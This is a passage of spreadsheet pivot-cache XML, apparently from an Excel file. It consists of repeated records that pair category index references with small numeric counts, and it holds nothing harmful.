    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="52"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1127"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="8"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1128"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="20"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="9"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1129"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1130"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="34"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1131"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1132"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="6"/>
    <x v="1133"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="22"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="9"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="42"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="44"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1134"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1135"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1136"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="89"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1137"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1138"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1139"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="3"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="8"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="50"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="100"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="45"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="86"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1140"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1141"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1142"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="80"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1143"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1144"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="50"/>
    <x v="272"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
